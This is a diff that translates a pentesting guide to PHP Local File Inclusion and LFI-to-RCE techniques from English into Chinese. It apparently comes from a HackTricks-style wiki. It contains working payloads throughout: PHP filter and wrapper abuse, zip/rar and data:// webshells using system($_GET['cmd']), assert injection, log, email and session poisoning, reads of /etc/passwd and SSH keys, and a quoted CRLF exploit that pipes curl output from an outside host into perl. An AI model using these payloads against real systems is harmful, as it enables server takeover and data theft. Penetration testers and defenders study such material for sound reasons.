-  - `zlib.inflate`: Decompress the data
+- `zlib.deflate`: 压缩内容（如果提取大量信息时很有用）
+- `zlib.inflate`: 解压数据
 - [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
-  - `mcrypt.*` : Deprecated
-  - `mdecrypt.*` : Deprecated
-- Other Filters
-  - Running in php `var_dump(stream_get_filters());` you can find a couple of **unexpected filters**:
-    - `consumed`
-    - `dechunk`: reverses HTTP chunked encoding
-    - `convert.*`
-
+- `mcrypt.*` : 已弃用
+- `mdecrypt.*` : 已弃用
+- 其他过滤器
+- 在 php 中运行 `var_dump(stream_get_filters());` 可以找到几个 **意外的过滤器**：
+- `consumed`
+- `dechunk`: 反转 HTTP 分块编码
+- `convert.*`
 ```php
 # String Filters
 ## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
@@ -314,44 +279,40 @@ echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource
 readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
 # note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
 ```
-
 > [!WARNING]
-> The part "php://filter" is case insensitive
+> "php://filter" 部分不区分大小写
 
-### Using php filters as oracle to read arbitrary files
+### 使用 php 过滤器作为 oracle 读取任意文件
 
-[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) is proposed a technique to read a local file without having the output given back from the server. This technique is based on a **boolean exfiltration of the file (char by char) using php filters** as oracle. This is because php filters can be used to make a text larger enough to make php throw an exception.
+[**在这篇文章中**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) 提出了一种在不从服务器返回输出的情况下读取本地文件的技术。该技术基于使用 php 过滤器作为 oracle 的 **布尔外泄文件（逐字符）**。这是因为 php 过滤器可以用来使文本变得足够大，从而使 php 抛出异常。
 
-In the original post you can find a detailed explanation of the technique, but here is a quick summary:
+在原始文章中可以找到该技术的详细解释，但这里是一个快速总结：
 
-- Use the codec **`UCS-4LE`** to leave leading character of the text at the begging and make the size of string increases exponentially.
-  - This will be used to generate a **text so big when the initial letter is guessed correctly** that php will trigger an **error**
-- The **dechunk** filter will **remove everything if the first char is not an hexadecimal**, so we can know if the first char is hex.
-  - This, combined with the previous one (and other filters depending on the guessed letter), will allow us to guess a letter at the beggining of the text by seeing when we do enough transformations to make it not be an hexadecimal character. Because if hex, dechunk won't delete it and the initial bomb will make php error.
-- The codec **convert.iconv.UNICODE.CP930** transforms every letter in the following one (so after this codec: a -> b). This allow us to discovered if the first letter is an `a` for example because if we apply 6 of this codec a->b->c->d->e->f->g the letter isn't anymore a hexadecimal character, therefore dechunk doesn't deleted it and the php error is triggered because it multiplies with the initial bomb.
-  - Using other transformations like **rot13** at the beginning it’s possible to leak other chars like n, o, p, q, r (and other codecs can be used to move other letters to the hex range).
-  - When the initial char is a number it’s needed to base64 encode it and leak the 2 first letters to leak the number.
-- The final problem is to see **how to leak more than the initial letter**. By using order memory filters like **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** is possible to change the order of the chars and get in the first position other letters of the text.
-  - And in order to be able to obtain **further data** the idea if to **generate 2 bytes of junk data at the beginning** with **convert.iconv.UTF16.UTF16**, apply **UCS-4LE** to make it **pivot with the next 2 bytes**, and d**elete the data until the junk data** (this will remove the first 2 bytes of the initial text). Continue doing this until you reach the disired bit to leak.
+- 使用编码 **`UCS-4LE`** 将文本的前导字符留在开头，并使字符串的大小呈指数级增长。
+- 这将用于生成一个 **当初始字母正确猜测时变得如此庞大的文本**，以至于 php 会触发一个 **错误**。
+- **dechunk** 过滤器将 **删除所有内容，如果第一个字符不是十六进制**，因此我们可以知道第一个字符是否是十六进制。
+- 这与前一个（以及其他根据猜测字母的过滤器）结合，将允许我们通过查看何时进行足够的转换使其不再是十六进制字符来猜测文本开头的字母。因为如果是十六进制，dechunk 不会删除它，初始炸弹将导致 php 错误。
+- 编码 **convert.iconv.UNICODE.CP930** 将每个字母转换为下一个字母（因此在此编码后：a -> b）。这使我们能够发现第一个字母是否是 `a`，例如，因为如果我们应用 6 次此编码 a->b->c->d->e->f->g，该字母不再是十六进制字符，因此 dechunk 不会删除它，php 错误被触发，因为它与初始炸弹相乘。
+- 使用其他转换如 **rot13** 在开头可以泄露其他字符如 n, o, p, q, r（其他编码可以用于将其他字母移动到十六进制范围）。
+- 当初始字符是数字时，需要对其进行 base64 编码并泄露前两个字母以泄露该数字。
+- 最后一个问题是查看 **如何泄露超过初始字母**。通过使用有序内存过滤器如 **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** 可以改变字符的顺序，并在文本的第一位置获取其他字母。
+- 为了能够获取 **更多数据**，想法是 **在开头生成 2 字节的垃圾数据**，使用 **convert.iconv.UTF16.UTF16**，应用 **UCS-4LE** 使其 **与接下来的 2 字节进行枢轴**，并 **删除数据直到垃圾数据**（这将删除初始文本的前 2 字节）。继续这样做，直到达到所需的泄露位。
 
-In the post a tool to perform this automatically was also leaked: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
+在文章中还泄露了一种自动执行此操作的工具：[php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit)。
 
 ### php://fd
 
-This wrapper allows to access file descriptors that the process has open. Potentially useful to exfiltrate the content of opened files:
-
+此包装器允许访问进程打开的文件描述符。可能对外泄打开文件的内容有用：
 ```php
 echo file_get_contents("php://fd/3");
 $myfile = fopen("/etc/passwd", "r");
 ```
+您还可以使用 **php://stdin, php://stdout 和 php://stderr** 分别访问 **文件描述符 0, 1 和 2**（不确定这在攻击中如何有用）
 
-You can also use **php://stdin, php://stdout and php://stderr** to access the **file descriptors 0, 1 and 2** respectively (not sure how this could be useful in an attack)
-
-### zip:// and rar://
-
-Upload a Zip or Rar file with a PHPShell inside and access it.\
-In order to be able to abuse the rar protocol it **need to be specifically activated**.
+### zip:// 和 rar://
 
+上传一个包含 PHPShell 的 Zip 或 Rar 文件并访问它。\
+为了能够滥用 rar 协议，它 **需要被特别激活**。
 ```bash
 echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
 zip payload.zip payload.php;
@@ -366,9 +327,7 @@ mv payload.rar shell.jpg;
 rm payload.php
 http://example.com/index.php?page=rar://shell.jpg%23payload.php
 ```
-
-### data://
-
+### 数据://
 ```
 http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
 http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
@@ -378,30 +337,24 @@ http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
 http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
 NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
 ```
-
-Note that this protocol is restricted by php configurations **`allow_url_open`** and **`allow_url_include`**
+请注意，此协议受 php 配置 **`allow_url_open`** 和 **`allow_url_include`** 的限制。
 
 ### expect://
 
-Expect has to be activated. You can execute code using this:
-
+必须激活 Expect。您可以使用此方法执行代码：
 ```
 http://example.com/index.php?page=expect://id
 http://example.com/index.php?page=expect://ls
 ```
-
 ### input://
 
-Specify your payload in the POST parameters:
-
+在POST参数中指定您的有效负载：
 ```bash
 curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
 ```
-
 ### phar://
 
-A `.phar` file can be utilized to execute PHP code when a web application leverages functions such as `include` for file loading. The PHP code snippet provided below demonstrates the creation of a `.phar` file:
-
+一个 `.phar` 文件可以在 web 应用程序利用 `include` 等函数进行文件加载时执行 PHP 代码。下面提供的 PHP 代码片段演示了如何创建一个 `.phar` 文件：
 ```php
 <?php
 $phar = new Phar('test.phar');
@@ -410,18 +363,15 @@ $phar->addFromString('test.txt', 'text');
 $phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
 $phar->stopBuffering();
 ```
-
-To compile the `.phar` file, the following command should be executed:
-
+要编译 `.phar` 文件，应执行以下命令：
 ```bash
 php --define phar.readonly=0 create_path.php
 ```
+执行后，将创建一个名为 `test.phar` 的文件，这可能被利用来利用本地文件包含（LFI）漏洞。
 
-Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
+在 LFI 仅执行文件读取而不执行其中的 PHP 代码的情况下，通过 `file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()` 或 `filesize()` 等函数，可以尝试利用反序列化漏洞。此漏洞与使用 `phar` 协议读取文件相关。
 
-In cases where the LFI only performs file reading without executing the PHP code within, through functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the `phar` protocol.
-
-For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:
+有关在 `.phar` 文件上下文中利用反序列化漏洞的详细理解，请参阅下面链接的文档：
 
 [Phar Deserialization Exploitation Guide](phar-deserialization.md)
 
@@ -431,95 +381,88 @@ phar-deserialization.md
 
 ### CVE-2024-2961
 
-It was possible to abuse **any arbitrary file read from PHP that supports php filters** to get a RCE. The detailed description can be [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
-Very quick summary: a **3 byte overflow** in the PHP heap was abused to **alter the chain of free chunks** of anspecific size in order to be able to **write anything in any address**, so a hook was added to call **`system`**.\
-It was possible to alloc chunks of specific sizes abusing more php filters.
+可以滥用 **任何支持 PHP 过滤器的任意文件读取** 来获得 RCE。详细描述可以在 [**此帖子中找到**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
+非常简要的总结：在 PHP 堆中滥用 **3 字节溢出** 来 **更改特定大小的空闲块链**，以便能够 **在任何地址写入任何内容**，因此添加了一个钩子来调用 **`system`**。\
+可以通过滥用更多 PHP 过滤器来分配特定大小的块。
 
-### More protocols
+### 更多协议
 
-Check more possible[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
+查看更多可能的 [**协议以包含在此**](https://www.php.net/manual/en/wrappers.php)**：**
 
-- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
-- [file://](https://www.php.net/manual/en/wrappers.file.php) — Accessing local filesystem
-- [http://](https://www.php.net/manual/en/wrappers.http.php) — Accessing HTTP(s) URLs
-- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Accessing FTP(s) URLs
-- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Compression Streams
-- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (It doesn't return nothing printable, so not really useful here)
-- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2
-- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Not useful to read arbitrary files)
+- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — 在内存或临时文件中写入（不确定这在文件包含攻击中如何有用）
+- [file://](https://www.php.net/manual/en/wrappers.file.php) — 访问本地文件系统
+- [http://](https://www.php.net/manual/en/wrappers.http.php) — 访问 HTTP(s) URL
+- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — 访问 FTP(s) URL
+- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — 压缩流
+- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — 查找匹配模式的路径名（它不返回任何可打印的内容，因此在这里并不真正有用）
+- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — 安全外壳 2
+- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — 音频流（不适合读取任意文件）
 
-## LFI via PHP's 'assert'
+## 通过 PHP 的 'assert' 进行 LFI
 
-Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.
-
-For example, PHP code might be designed to prevent directory traversal like so:
+在处理 'assert' 函数时，PHP 中的本地文件包含（LFI）风险显著较高，因为它可以在字符串中执行代码。如果输入包含目录遍历字符如 ".." 被检查但未正确清理，这尤其成问题。
 
+例如，PHP 代码可能被设计为防止目录遍历，如下所示：
 ```bash
 assert("strpos('$file', '..') === false") or die("");
 ```
-
-While this aims to stop traversal, it inadvertently creates a vector for code injection. To exploit this for reading file contents, an attacker could use:
-
+虽然这旨在阻止遍历，但不经意间创建了代码注入的向量。为了利用这一点读取文件内容，攻击者可以使用：
 ```plaintext
 ' and die(highlight_file('/etc/passwd')) or '
 ```
-
-Similarly, for executing arbitrary system commands, one might use:
-
+同样，对于执行任意系统命令，可以使用：
 ```plaintext
 ' and die(system("id")) or '
 ```
-
-It's important to **URL-encode these payloads**.
+重要的是要**对这些有效负载进行URL编码**。
 
 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客见解**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金发布和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们在** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作！
 
-## PHP Blind Path Traversal
+## PHP盲路径遍历
 
 > [!WARNING]
-> This technique is relevant in cases where you **control** the **file path** of a **PHP function** that will **access a file** but you won't see the content of the file (like a simple call to **`file()`**) but the content is not shown.
+> 该技术适用于您**控制**一个**PHP函数**的**文件路径**的情况，该函数将**访问一个文件**但您看不到文件的内容（如简单调用**`file()`**），但内容不会显示。
 
-In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) it's explained how a blind path traversal can be abused via PHP filter to **exfiltrate the content of a file via an error oracle**.
+在[**这篇精彩的文章**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)中解释了如何通过PHP过滤器滥用盲路径遍历以**通过错误oracle提取文件内容**。
 
-As sumary, the technique is using the **"UCS-4LE" encoding** to make the content of a file so **big** that the **PHP function opening** the file will trigger an **error**.
+总之，该技术使用**"UCS-4LE"编码**使文件内容变得如此**庞大**，以至于**打开**该文件的**PHP函数**将触发一个**错误**。
 
-Then, in order to leak the first char the filter **`dechunk`** is used along with other such as **base64** or **rot13** and finally the filters **convert.iconv.UCS-4.UCS-4LE** and **convert.iconv.UTF16.UTF-16BE** are used to **place other chars at the beggining and leak them**.
+然后，为了泄露第一个字符，使用过滤器**`dechunk`**，以及其他如**base64**或**rot13**，最后使用过滤器**convert.iconv.UCS-4.UCS-4LE**和**convert.iconv.UTF16.UTF-16BE**来**在开头放置其他字符并泄露它们**。
 
-**Functions that might be vulnerable**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
+**可能存在漏洞的函数**：`file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (仅限目标只读)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
 
-For the technical details check the mentioned post!
+有关技术细节，请查看上述文章！
 
 ## LFI2RCE
 
-### Remote File Inclusion
+### 远程文件包含
 
-Explained previously, [**follow this link**](./#remote-file-inclusion).
+如前所述，[**请访问此链接**](./#remote-file-inclusion)。
 
-### Via Apache/Nginx log file
+### 通过Apache/Nginx日志文件
 
-If the Apache or Nginx server is **vulnerable to LFI** inside the include function you could try to access to **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, set inside the **user agent** or inside a **GET parameter** a php shell like **`<?php system($_GET['c']); ?>`** and include that file
+如果Apache或Nginx服务器在包含函数中**易受LFI攻击**，您可以尝试访问**`/var/log/apache2/access.log`或`/var/log/nginx/access.log`**，在**用户代理**或**GET参数**中设置一个php shell，如**`<?php system($_GET['c']); ?>`**并包含该文件。
 
 > [!WARNING]
-> Note that **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.
+> 请注意，如果您为shell使用双引号而不是**单引号**，双引号将被修改为字符串"_**quote;**_"，**PHP将在那里抛出错误**，并且**不会执行其他任何内容**。
 >
-> Also, make sure you **write correctly the payload** or PHP will error every time it tries to load the log file and you won't have a second opportunity.
-
-This could also be done in other logs but **be careful,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.\
-Other possible log paths:
+> 此外，请确保**正确编写有效负载**，否则每次尝试加载日志文件时PHP都会出错，您将没有第二次机会。
 
+这也可以在其他日志中完成，但**请小心，**日志中的代码可能会被URL编码，这可能会破坏Shell。头部**授权 "basic"**包含"用户:密码"的Base64编码，并在日志中解码。PHPShell可以插入到此头部中。\
+其他可能的日志路径：
 ```python
 /var/log/apache2/access.log
 /var/log/apache/access.log
@@ -531,187 +474,166 @@ Other possible log paths:
 /var/log/nginx/error.log
 /var/log/httpd/error_log
 ```
+模糊测试字典: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
 
-Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
+### 通过电子邮件
 
-### Via Email
+**发送邮件**到内部账户 (user@localhost)，包含你的 PHP 负载，如 `<?php echo system($_REQUEST["cmd"]); ?>`，并尝试包含用户的邮件，路径如 **`/var/mail/<USERNAME>`** 或 **`/var/spool/mail/<USERNAME>`**
 
-**Send a mail** to a internal account (user@localhost) containing your PHP payload like `<?php echo system($_REQUEST["cmd"]); ?>` and try to include to the mail of the user with a path like **`/var/mail/<USERNAME>`** or **`/var/spool/mail/<USERNAME>`**
+### 通过 /proc/\*/fd/\*
 
-### Via /proc/\*/fd/\*
+1. 上传大量的 shell（例如：100）
+2. 包含 [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD)，其中 $PID = 进程的 PID（可以暴力破解），$FD 是文件描述符（也可以暴力破解）
 
-1. Upload a lot of shells (for example : 100)
-2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)
-
-### Via /proc/self/environ
-
-Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
+### 通过 /proc/self/environ
 
+像日志文件一样，在 User-Agent 中发送负载，它将反映在 /proc/self/environ 文件中
 ```
 GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
 User-Agent: <?=phpinfo(); ?>
 ```
+### 通过上传
 
-### Via upload
-
-If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
-
+如果您可以上传文件，只需在其中注入 shell 负载 (例如：`<?php system($_GET['c']); ?>`)。
 ```
 http://example.com/index.php?page=path/to/uploaded/file.png
 ```
+为了保持文件的可读性，最好将其注入到图片/doc/pdf 的元数据中。
 
-In order to keep the file readable it is best to inject into the metadata of the pictures/doc/pdf
-
-### Via Zip fie upload
-
-Upload a ZIP file containing a PHP shell compressed and access:
+### 通过 ZIP 文件上传
 
+上传一个包含压缩 PHP shell 的 ZIP 文件并访问：
 ```python
 example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
 ```
+### 通过 PHP 会话
 
-### Via PHP sessions
-
-Check if the website use PHP Session (PHPSESSID)
-
+检查网站是否使用 PHP 会话 (PHPSESSID)
 ```
 Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
 Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
 ```
-
-In PHP these sessions are stored into _/var/lib/php5/sess\\_\[PHPSESSID]\_ files
-
+在 PHP 中，这些会话存储在 _/var/lib/php5/sess\\_\[PHPSESSID]\_ 文件中。
 ```
 /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
 user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
 ```
-
-Set the cookie to `<?php system('cat /etc/passwd');?>`
-
+将 cookie 设置为 `<?php system('cat /etc/passwd');?>`
 ```
 login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
 ```
-
-Use the LFI to include the PHP session file
-
+使用 LFI 包含 PHP 会话文件
 ```
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
 ```
+### 通过 ssh
 
-### Via ssh
+如果 ssh 处于活动状态，请检查正在使用的用户（/proc/self/status & /etc/passwd），并尝试访问 **\<HOME>/.ssh/id_rsa**
 
-If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access **\<HOME>/.ssh/id_rsa**
+### **通过** **vsftpd** _**日志**_
 
-### **Via** **vsftpd** _**logs**_
+FTP 服务器 vsftpd 的日志位于 _**/var/log/vsftpd.log**_。在存在本地文件包含（LFI）漏洞的情况下，并且可以访问暴露的 vsftpd 服务器，可以考虑以下步骤：
 
-The logs for the FTP server vsftpd are located at _**/var/log/vsftpd.log**_. In the scenario where a Local File Inclusion (LFI) vulnerability exists, and access to an exposed vsftpd server is possible, the following steps can be considered:
+1. 在登录过程中将 PHP 有效负载注入到用户名字段中。
+2. 注入后，利用 LFI 从 _**/var/log/vsftpd.log**_ 检索服务器日志。
 
-1. Inject a PHP payload into the username field during the login process.
-2. Post injection, utilize the LFI to retrieve the server logs from _**/var/log/vsftpd.log**_.
-
-### Via php base64 filter (using base64)
-
-As shown in [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter just ignore Non-base64.You can use that to bypass the file extension check: if you supply base64 that ends with ".php", and it would just ignore the "." and append "php" to the base64. Here is an example payload:
+### 通过 php base64 过滤器（使用 base64）
 
+如 [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) 文章所示，PHP base64 过滤器只会忽略非 base64。您可以利用这一点绕过文件扩展名检查：如果您提供以 ".php" 结尾的 base64，它只会忽略 "." 并将 "php" 附加到 base64。以下是一个有效负载示例：
 ```url
 http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
 
 NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
 ```
+### 通过 php 过滤器（无需文件）
 
-### Via php filters (no file needed)
-
-This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
+这个 [**写作**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) 解释了你可以使用 **php 过滤器生成任意内容** 作为输出。这基本上意味着你可以 **生成任意 php 代码** 进行包含 **而无需将其写入** 文件。
 
 {{#ref}}
 lfi2rce-via-php-filters.md
 {{#endref}}
 
-### Via segmentation fault
+### 通过段错误
 
-**Upload** a file that will be stored as **temporary** in `/tmp`, then in the **same request,** trigger a **segmentation fault**, and then the **temporary file won't be deleted** and you can search for it.
+**上传** 一个将被存储为 **临时** 文件在 `/tmp`，然后在 **同一请求中** 触发 **段错误**，然后 **临时文件将不会被删除**，你可以搜索它。
 
 {{#ref}}
 lfi2rce-via-segmentation-fault.md
 {{#endref}}
 
-### Via Nginx temp file storage
+### 通过 Nginx 临时文件存储
 
-If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique:
+如果你发现了 **本地文件包含** 并且 **Nginx** 在 PHP 前面运行，你可能能够通过以下技术获得 RCE：
 
 {{#ref}}
 lfi2rce-via-nginx-temp-files.md
 {{#endref}}
 
-### Via PHP_SESSION_UPLOAD_PROGRESS
+### 通过 PHP_SESSION_UPLOAD_PROGRESS
 
-If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**. You could abuse this to get RCE:
+如果你发现了 **本地文件包含** 即使你 **没有会话** 并且 `session.auto_start` 是 `Off`。如果你在 **multipart POST** 数据中提供 **`PHP_SESSION_UPLOAD_PROGRESS`**，PHP 将 **为你启用会话**。你可以利用这一点获得 RCE：
 
 {{#ref}}
 via-php_session_upload_progress.md
 {{#endref}}
 
-### Via temp file uploads in Windows
+### 通过 Windows 中的临时文件上传
 
-If you found a **Local File Inclusion** and and the server is running in **Windows** you might get RCE:
+如果你发现了 **本地文件包含** 并且服务器在 **Windows** 中运行，你可能会获得 RCE：
 
 {{#ref}}
 lfi2rce-via-temp-file-uploads.md
 {{#endref}}
 
-### Via `pearcmd.php` + URL args
+### 通过 `pearcmd.php` + URL 参数
 
-As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument.
-
-The following request create a file in `/tmp/hello.php` with the content `<?=phpinfo()?>`:
+正如 [**在这篇文章中解释的**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp)，脚本 `/usr/local/lib/phppearcmd.php` 在 php docker 镜像中默认存在。此外，可以通过 URL 向脚本传递参数，因为它表明如果 URL 参数没有 `=`，则应将其用作参数。
 
+以下请求在 `/tmp/hello.php` 中创建一个内容为 `<?=phpinfo()?>` 的文件：
 ```bash
 GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
 ```
-
-The following abuses a CRLF vuln to get RCE (from [**here**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)):
-
+以下利用CRLF漏洞获取RCE（来自[**这里**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)）：
 ```
 http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
 Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
 Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
 %0d%0a
 ```
+### 通过 phpinfo() (file_uploads = on)
 
-### Via phpinfo() (file_uploads = on)
-
-If you found a **Local File Inclusion** and a file exposing **phpinfo()** with file_uploads = on you can get RCE:
+如果你发现了 **Local File Inclusion** 和一个暴露 **phpinfo()** 的文件，且 file_uploads = on，你可以获得 RCE：
 
 {{#ref}}
 lfi2rce-via-phpinfo.md
 {{#endref}}
 
-### Via compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure
+### 通过 compress.zlib + `PHP_STREAM_PREFER_STUDIO` + 路径泄露
 
-If you found a **Local File Inclusion** and you **can exfiltrate the path** of the temp file BUT the **server** is **checking** if the **file to be included has PHP marks**, you can try to **bypass that check** with this **Race Condition**:
+如果你发现了 **Local File Inclusion** 并且你 **可以提取临时文件的路径**，但 **服务器** 正在 **检查** 要包含的 **文件是否有 PHP 标记**，你可以尝试通过这个 **竞争条件** 来 **绕过该检查**：
 
 {{#ref}}
 lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
 {{#endref}}
 
-### Via eternal waiting + bruteforce
+### 通过永恒等待 + 暴力破解
 
-If you can abuse the LFI to **upload temporary files** and make the server **hang** the PHP execution, you could then **brute force filenames during hours** to find the temporary file:
+如果你可以利用 LFI **上传临时文件** 并使服务器 **挂起** PHP 执行，你可以 **在数小时内暴力破解文件名** 以找到临时文件：
 
 {{#ref}}
 lfi2rce-via-eternal-waiting.md
 {{#endref}}
 
-### To Fatal Error
+### 到致命错误
 
-If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (You need to include the same one 2 time to throw that error).
+如果你包含任何文件 `/usr/bin/phar`、`/usr/bin/phar7`、`/usr/bin/phar.phar7`、`/usr/bin/phar.phar`。（你需要包含同一个文件 2 次以引发该错误）。
 
-**I don't know how is this useful but it might be.**\
-&#xNAN;_&#x45;ven if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
+**我不知道这有什么用，但可能有用。**\
+&#xNAN;_&#x45;即使你导致 PHP 致命错误，上传的 PHP 临时文件也会被删除。_
 
